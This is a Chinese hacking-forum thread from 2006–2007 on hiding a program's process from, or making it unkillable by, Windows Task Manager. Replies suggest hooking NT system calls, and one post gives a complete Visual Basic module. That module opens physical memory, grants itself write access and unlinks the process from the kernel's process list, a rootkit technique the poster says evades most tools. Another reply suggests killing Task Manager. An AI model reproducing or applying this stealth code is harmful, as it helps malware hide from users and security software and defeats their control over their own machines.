Board logo

标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程 [打印本页]

作者: 无条件为你    时间: 2006-12-23 11:35     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

[这个贴子最后由无条件为你在 2006/12/23 11:42am 第 1 次编辑]

[color=#FF0099]     希望大家能贴出各自的处理方法。我将在元旦那天贴出我的两种原创思路(纯代码实现,不用引入其它DLL文件)
[color=#003FFF]本着技术交流的原则,希望大家不要吝啬自己的源码!
程序代码能解决下述两点问题任意一点即可:
1.直接不在任务管理器中显示进程。
2.显示进程,但不能被杀。


作者: 默数悲伤    时间: 2006-12-23 11:47     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

Hook NTQuerySystemInformation,让任务管理器看不到
或者Hook NTOpenProcess和NTTerminateProcess让他结束不了


作者: 无条件为你    时间: 2006-12-23 12:44     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

下面引用由默数悲伤2006/12/23 11:47am 发表的内容: Hook NTQuerySystemInformation,让任务管理器看不到
或者Hook NTOpenProcess和NTTerminateProcess让他结束不了
您所说的我不懂,不知可否提供示例。 我的实现方法是我自己想出来的,没有前人引路,因此我在摸索中走了不少弯路。 2007年1月1日我会贴出代码,而且注释详尽,任何人都可以看懂。
作者: 默数悲伤    时间: 2006-12-23 13:00     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

好吧,期待楼主的大作。
但是你说不引入任何DLL,貌似不可能哦,程序怎么跑?
其实能过任务管理器不是最重要的。
现在的进程查杀工具太多了,如果是查找窗口的话,应该不是一个好方法。而且象IceSword的窗口标题都是在变的。
希望楼主能够提出一种全新通用的方法,以饷广大菜鸟。
作者: 无条件为你    时间: 2006-12-23 17:03     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

     不在程序中引入DLL,但前提是你要有操作系统才行。换句话来说,支持操作系统运行的某些关键DLL当然要有。否则连系统都启动不了,那还搞个啥?
     这里仅讨论对任务管理器有效,不包含其它杀进程的软件。
     谈不上大作,雕虫小计。
     之所在在元旦那天说一下我的思路,是想留出一些时间让其他人公布自己已掌握的方法,如果来者都吝啬自己的源码而抱着索取而不奉献的态度,那么我到时候只公布EXE。如果我看到其它人回复了哪怕只有一种可编译通过的代码(能实现所述功能),那么我将会毫不保留的公布我的两种方法。
作者: x86    时间: 2006-12-23 18:55     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

其实楼主的方法我也有猜测,但是现在不能说。
等楼主的源吗出来了,我再做评论吧。
这个东西也只是理论上有接触,但是并没有在实际中测试过。只做过进程创建监控。
这个说说理论就可以了,不一定非要具体实现。
楼主也不一定非要别人放源码才肯放你的源码 ,如果不愿意放,也可以大家交流交流思路呀。
作者: 无条件为你    时间: 2006-12-23 21:08     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

楼上的朋友说的不错,这话我爱听。
我的思路见怪不怪,一般没人会想到,但已经实现并生成了EXE。
您如果有什么猜测不防说说,或者你的猜测是另一种我不知道的思路。
作者: 狰狞的怪    时间: 2007-1-26 05:10     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

偶见过一段可以隐藏进程的代码,但是现在在网吧,等回宿舍后发过来。
作者: 狰狞的怪    时间: 2007-1-26 21:44     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程


恩,找到了
作者: 我是中国人    时间: 2007-2-15 22:19     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

我给你一个直接在进程里隐藏的代码 2000/XP下完全隐藏 只有江民跟冰刃才能看见 VC++的效果要更好些 Option Explicit ';----------------------------------------------------- ';模块名称:modHideProcess.bas '; ';模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程 '; ';使用方法:直接调用 HideCurrentProcess() Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004 Private Const STATUS_ACCESS_DENIED = &HC0000022 Private Const STATUS_INVALID_HANDLE = &HC0000008 Private Const ERROR_SUCCESS = 0& Private Const SECTION_MAP_WRITE = &H2 Private Const SECTION_MAP_READ = &H4 Private Const READ_CONTROL = &H20000 Private Const WRITE_DAC = &H40000 Private Const NO_INHERITANCE = 0 Private Const DACL_SECURITY_INFORMATION = &H4 Private Type IO_STATUS_BLOCK Status As Long Information As Long End Type Private Type UNICODE_STRING Length As Integer MaximumLength As Integer Buffer As Long End Type Private Const OBJ_INHERIT = &H2 Private Const OBJ_PERMANENT = &H10 Private Const OBJ_EXCLUSIVE = &H20 Private Const OBJ_CASE_INSENSITIVE = &H40 Private Const OBJ_OPENIF = &H80 Private Const OBJ_OPENLINK = &H100 Private Const OBJ_KERNEL_HANDLE = &H200 Private Const OBJ_VALID_ATTRIBUTES = &H3F2 Private Type OBJECT_ATTRIBUTES Length As Long RootDirectory As Long ObjectName As Long Attributes As Long SecurityDeor As Long SecurityQualityOfService As Long End Type Private Type ACL AclRevision As Byte Sbz1 As Byte AclSize As Integer AceCount As Integer Sbz2 As Integer End Type Private Enum ACCESS_MODE NOT_USED_ACCESS GRANT_ACCESS SET_ACCESS DENY_ACCESS REVOKE_ACCESS SET_AUDIT_SUCCESS SET_AUDIT_FAILURE End Enum Private Enum MULTIPLE_TRUSTEE_OPERATION NO_MULTIPLE_TRUSTEE TRUSTEE_IS_IMPERSONATE End Enum Private Enum TRUSTEE_FORM TRUSTEE_IS_SID TRUSTEE_IS_NAME End Enum Private Enum TRUSTEE_TYPE TRUSTEE_IS_UNKNOWN TRUSTEE_IS_USER TRUSTEE_IS_GROUP End Enum Private Type TRUSTEE pMultipleTrustee As Long MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION TrusteeForm As TRUSTEE_FORM TrusteeType As TRUSTEE_TYPE ptstrName As String End Type Private Type EXPLICIT_ACCESS grfAccessPermissions As Long grfAccessMode As ACCESS_MODE grfInheritance As Long TRUSTEE As TRUSTEE End Type Private Type AceArray List() As EXPLICIT_ACCESS End Type Private Enum SE_OBJECT_TYPE SE_UNKNOWN_OBJECT_TYPE = 0 SE_FILE_OBJECT SE_SERVICE SE_PRINTER SE_REGISTRY_KEY SE_LMSHARE SE_KERNEL_OBJECT SE_WINDOW_OBJECT SE_DS_OBJECT SE_DS_OBJECT_ALL SE_PROVIDER_DEFINED_OBJECT SE_WMIGUID_OBJECT End Enum Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long) Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long) Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long Private Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type Private verinfo As OSVERSIONINFO Private g_hNtDLL As Long Private g_pMapPhysicalMemory As Long Private g_hMPM As Long Private aByte(3) As Byte Public Sub HideCurrentProcess() ';在进程列表中隐藏当前应用程序进程 Dim thread As Long, process As Long, fw As Long, bw As Long Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long verinfo.dwOSVersionInfoSize = Len(verinfo) If (GetVersionEx(verinfo)) <> 0 Then If verinfo.dwPlatformId = 2 Then If verinfo.dwMajorVersion = 5 Then Select Case verinfo.dwMinorVersion Case 0 lOffsetFlink = &HA0 lOffsetBlink = &HA4 lOffsetPID = &H9C Case 1 lOffsetFlink = &H88 lOffsetBlink = &H8C lOffsetPID = &H84 End Select End If End If End If If OpenPhysicalMemory <> 0 Then thread = GetData(&HFFDFF124) process = GetData(thread + &H44) fw = GetData(process + lOffsetFlink) bw = GetData(process + lOffsetBlink) SetData fw + 4, bw SetData bw, fw CloseHandle g_hMPM End If End Sub Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long) Dim pDacl As Long Dim pNewDacl As Long Dim pSD As Long Dim dwRes As Long Dim ea As EXPLICIT_ACCESS GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD ea.grfAccessPermissions = SECTION_MAP_WRITE ea.grfAccessMode = GRANT_ACCESS ea.grfInheritance = NO_INHERITANCE ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar SetEntriesInAcl 1, ea, pDacl, pNewDacl SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0 CleanUp: LocalFree pSD LocalFree pNewDacl End Sub Private Function OpenPhysicalMemory() As Long Dim Status As Long Dim PhysmemString As UNICODE_STRING Dim Attributes As OBJECT_ATTRIBUTES RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory") Attributes.Length = Len(Attributes) Attributes.RootDirectory = 0 Attributes.ObjectName = VarPtr(PhysmemString) Attributes.Attributes = 0 Attributes.SecurityDeor = 0 Attributes.SecurityQualityOfService = 0 Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) If Status = STATUS_ACCESS_DENIED Then Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes) SetPhyscialMemorySectionCanBeWrited g_hMPM CloseHandle g_hMPM Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) End If Dim lDirectoty As Long verinfo.dwOSVersionInfoSize = Len(verinfo) If (GetVersionEx(verinfo)) <> 0 Then If verinfo.dwPlatformId = 2 Then If verinfo.dwMajorVersion = 5 Then Select Case verinfo.dwMinorVersion Case 0 lDirectoty = &H30000 Case 1 lDirectoty = &H39000 End Select End If End If End If If Status = 0 Then g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000) If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM End If End Function Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long Dim lTemp As Long VAddr = addr CopyMemory aByte(0), VAddr, 4 lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22)) PGDE = BaseAddress + lTemp * 4 CopyMemory PGDE, ByVal PGDE, 4 If (PGDE And 1) <> 0 Then lTemp = PGDE And &H80 If lTemp <> 0 Then PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF) Else PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000) lTemp = (VAddr And &H3FF000) / (2 ^ 12) PTE = PGDE + lTemp * 4 CopyMemory PTE, ByVal PTE, 4 If (PTE And 1) <> 0 Then PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF) UnmapViewOfFile PGDE End If End If End If LinearToPhys = PAddr End Function Private Function GetData(addr As Long) As Long Dim phys As Long, tmp As Long, ret As Long phys = LinearToPhys(g_pMapPhysicalMemory, addr) tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000) If tmp <> 0 Then ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4 CopyMemory ret, ByVal ret, 4 UnmapViewOfFile tmp GetData = ret End If End Function Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean Dim phys As Long, tmp As Long, x As Long phys = LinearToPhys(g_pMapPhysicalMemory, addr) tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000) If tmp <> 0 Then x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4 CopyMemory ByVal x, data, 4 UnmapViewOfFile tmp SetData = True End If End Function Private Function ByteArrToLong(inByte() As Byte) As Double Dim I As Integer For I = 0 To 3 ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I) Next I End Function 调用 App.TaskVisible = False Call HideCurrentProcess
作者: 无条件为你    时间: 2007-3-9 13:26     标题: [讨论]如何防止任务管理器杀掉自己所编程序的进程

下面引用由狰狞的怪2007/01/26 09:44pm 发表的内容:
恩,找到了
你的这个我在VC6.0下编译提示找不到psapi.h文件。

作者: htz92127    时间: 2007-3-15 22:06

简单一点,让程序杀掉任务管理器就可以了啊




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2